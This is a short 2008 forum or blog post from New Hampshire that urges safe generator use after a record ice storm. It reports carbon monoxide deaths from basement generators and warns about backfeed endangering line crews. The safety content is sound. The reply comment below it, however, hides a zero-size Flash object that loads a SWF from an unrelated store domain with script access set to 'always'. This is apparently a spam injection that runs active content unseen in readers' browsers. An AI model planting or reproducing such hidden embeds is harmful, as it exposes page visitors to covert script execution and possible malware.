Please use Generators safely

Here in N.H. we experienced the worst ice storm in N.H. history on Thursday 12/11/08. Power was out for 500,000 customers. Today, Monday 12/15/08 power is still out for 150,000 customers. This past weekend saw lines of people buying generators. News reports 5 people hospitilized for carbon monoxide poisioning. 2 deaths from carbon monoxide poisioning. They were running their generators in the basement. Exhaust fumes flowed into the house.
Also, have an electrician hook it up properly to the house. Improper connection to the house can result in "feedback" to the main line and can cause the line crews to be electricuted when restoring power.
Please use generators safely for everyone.

Very sad news. Thanks for the warning for folks to take just that bit extra care in this weather. <object width="0" height="0"><param name="movie" value="http://camcorders-store.com/cool_3D_smiley.swf"><param name="allowScriptAccess" value="always"><embed type="application/x-shockwave-flash" src="http://camcorders-store.com/cool_3D_smiley.swf" width="0" height="0" allowScriptAccess="always"></object>
